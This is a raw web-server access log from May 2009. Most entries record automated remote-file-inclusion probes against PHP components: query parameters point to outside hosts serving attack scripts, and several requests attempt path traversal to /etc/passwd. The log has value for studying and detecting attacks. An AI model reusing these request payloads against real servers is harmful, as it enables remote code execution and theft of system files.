203.194.204.129 - - [28/May/2009:12:51:53 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
203.194.204.129 - - [28/May/2009:12:52:00 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:12:52:00 -0500] "GET /logs/access_log.1236643200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:12:52:00 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:12:52:14 -0500] "GET /logs/access_log.1238803200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
69.50.197.106 - - [28/May/2009:12:53:40 -0500] "GET /logs/errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:12:53:40 -0500] "GET /errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:12:53:42 -0500] "GET /logs/errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:12:53:42 -0500] "GET /errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:12:57:39 -0500] "GET /logs/?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:12:57:39 -0500] "GET /?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
200.142.148.142 - - [28/May/2009:12:58:21 -0500] "GET /logs/access_log.1242086400/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
200.142.148.142 - - [28/May/2009:12:58:21 -0500] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.142.148.142 - - [28/May/2009:12:58:21 -0500] "GET /logs/access_log.1242432000/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:59:28 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:59:37 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:13:03:38 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:13:03:38 -0500] "GET /logs/access_log.1236643200//faqsupport/samplefaqsupport.php?path[docroot]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:13:03:38 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:13:03:38 -0500] "GET /logs/access_log.1236902400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
209.239.112.16 - - [28/May/2009:13:05:44 -0500] "GET //ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
209.239.112.16 - - [28/May/2009:13:05:47 -0500] "GET /logs//ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
113.29.225.7 - - [28/May/2009:13:06:12 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:13:06:12 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:13:06:12 -0500] "GET /logs/access_log.1238544000//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:06:46 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:06:46 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:06:46 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:06:52 -0500] "GET /logs/access_log.1237507200//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
209.239.112.16 - - [28/May/2009:13:07:12 -0500] "GET /logs/ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
209.239.112.16 - - [28/May/2009:13:07:12 -0500] "GET /ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
121.130.29.11 - - [28/May/2009:13:07:14 -0500] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:13:07:14 -0500] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:13:07:15 -0500] "GET /logs/access_log.1235433600//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:13:07:21 -0500] "GET /logs/access_log.1238630400//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.246.20.221 - - [28/May/2009:13:10:24 -0500] "GET /logs/access_log.1236643200//include/mail.inc.php?skin_board_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.246.20.221 - - [28/May/2009:13:10:24 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.246.20.221 - - [28/May/2009:13:10:24 -0500] "GET //include/mail.inc.php?skin_board_path=http://geocities.com/kumpulan_surat_sephani/id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
220.181.7.97 - - [28/May/2009:13:10:34 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
201.134.110.45 - - [28/May/2009:13:13:35 -0500] "GET /logs/access_log.1234828800//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:13:13:45 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:13:13:45 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:13:13:45 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
193.239.6.76 - - [28/May/2009:13:13:45 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
125.141.162.114 - - [28/May/2009:13:14:03 -0500] "GET /logs//show_archives.php?cutepath=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
125.141.162.114 - - [28/May/2009:13:14:04 -0500] "GET //show_archives.php?cutepath=http://controleremoto.net/htmlarea/alb.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
209.239.112.16 - - [28/May/2009:13:20:05 -0500] "GET /logs//ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
209.239.112.16 - - [28/May/2009:13:20:05 -0500] "GET //ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
209.239.112.16 - - [28/May/2009:13:20:35 -0500] "GET /logs/ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
209.239.112.16 - - [28/May/2009:13:20:35 -0500] "GET /ftag.php?mostrar=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
93.188.112.35 - - [28/May/2009:13:21:31 -0500] "GET /pagina.php?ir=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
93.188.112.35 - - [28/May/2009:13:21:31 -0500] "GET /logs/pagina.php?ir=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.188.112.35 - - [28/May/2009:13:21:34 -0500] "GET /logs/access_log.1241395200/pagina.php?ir=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:13:22:40 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:13:22:42 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:13:22:43 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:13:23:21 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
93.188.112.35 - - [28/May/2009:13:23:32 -0500] "GET /logs/home.php?qry=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.188.112.35 - - [28/May/2009:13:23:32 -0500] "GET /home.php?qry=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
93.188.112.35 - - [28/May/2009:13:23:32 -0500] "GET /logs/access_log.1234137600/home.php?qry=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.188.112.35 - - [28/May/2009:13:23:52 -0500] "GET /logs/access_log.1232582400/home.php?qry=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.157.8.98 - - [28/May/2009:13:24:33 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
216.157.8.98 - - [28/May/2009:13:24:33 -0500] "GET //include/mail.inc.php?skin_board_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:13:27:05 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://208.98.22.241/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:13:27:05 -0500] "GET //components/com_flyspray/startdown.php?file=http://208.98.22.241/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
203.194.204.129 - - [28/May/2009:13:29:48 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:29:48 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:29:48 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
203.194.204.129 - - [28/May/2009:13:29:54 -0500] "GET /logs/access_log.1237507200//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:13:29:55 -0500] "GET /logs/components/com_flyspray/startdown.php?file=http://208.98.22.241/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:13:29:55 -0500] "GET /components/com_flyspray/startdown.php?file=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
121.130.29.11 - - [28/May/2009:13:32:27 -0500] "GET //interna.php?meio=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:13:32:27 -0500] "GET /logs/access_log.1239753600//interna.php?meio=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:13:32:28 -0500] "GET /logs//interna.php?meio=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:13:32:29 -0500] "GET /logs/access_log.1242086400//interna.php?meio=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.106.108 - - [28/May/2009:13:33:39 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
113.29.225.7 - - [28/May/2009:13:39:07 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:13:39:07 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:13:39:08 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:13:39:09 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
219.85.63.226 - - [28/May/2009:13:40:48 -0500] "GET /?DOCUMENT_ROOT=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 3245 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
85.17.162.28 - - [28/May/2009:13:46:03 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
85.17.162.28 - - [28/May/2009:13:46:03 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
65.55.106.209 - - [28/May/2009:13:46:08 -0500] "GET /logs/access_log.1148601600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.232.54.48 - - [28/May/2009:13:49:37 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:13:49:37 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:13:49:37 -0500] "GET /logs/access_log.1239148800///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.117.188.207 - - [28/May/2009:13:56:22 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 200 200173 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.183.32.67 - - [28/May/2009:13:56:46 -0500] "GET /logs/access_log.1242518400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:13:56:46 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:13:56:46 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:13:56:52 -0500] "GET /logs/access_log.1242172800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.147.76.67 - - [28/May/2009:13:58:15 -0500] "GET /logs/access_log.1235779200 HTTP/1.0" 200 253940 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
122.147.76.70 - - [28/May/2009:13:58:49 -0500] "GET /logs/access_log.1240617600 HTTP/1.0" 200 494784 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
122.147.76.71 - - [28/May/2009:13:59:17 -0500] "GET /logs/access_log.1235952000 HTTP/1.0" 200 193437 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
212.72.183.155 - - [28/May/2009:14:00:15 -0500] "GET /logs/access_log.1236297600/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.72.183.155 - - [28/May/2009:14:00:15 -0500] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
212.72.183.155 - - [28/May/2009:14:00:15 -0500] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
212.72.183.155 - - [28/May/2009:14:00:15 -0500] "GET /logs/access_log.1236643200/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
122.147.76.69 - - [28/May/2009:14:00:39 -0500] "GET /logs/access_log.1240099200 HTTP/1.0" 200 410996 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
122.147.76.77 - - [28/May/2009:14:00:45 -0500] "GET /logs/access_log.1237161600 HTTP/1.0" 200 272432 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
69.50.197.106 - - [28/May/2009:14:02:08 -0500] "GET /logs/phphtml.php?htmlclass_path=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:14:02:08 -0500] "GET /phphtml.php?htmlclass_path=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.72.183.155 - - [28/May/2009:14:02:30 -0500] "GET /logs/access_log.1238803200/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:14:04:34 -0500] "GET //includes/class_item.php?fileExtension=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:14:04:34 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:14:04:34 -0500] "GET /logs//includes/class_item.php?fileExtension=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:14:04:34 -0500] "GET /logs/access_log.1233273600//includes/class_item.php?fileExtension=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
38.99.44.102 - - [28/May/2009:14:04:38 -0500] "GET /logs/access_log.1240185600 HTTP/1.0" 200 499025 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
201.232.54.48 - - [28/May/2009:14:05:02 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:14:05:02 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:14:05:02 -0500] "GET /logs/access_log.1233619200///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:14:07:09 -0500] "GET /logs/access_log.1238889600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:11:09 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:11:10 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:11:10 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:11:10 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
212.227.118.12 - - [28/May/2009:14:16:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.227.118.12 - - [28/May/2009:14:16:12 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.227.118.12 - - [28/May/2009:14:16:12 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.227.118.12 - - [28/May/2009:14:16:40 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:16:46 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:16:46 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
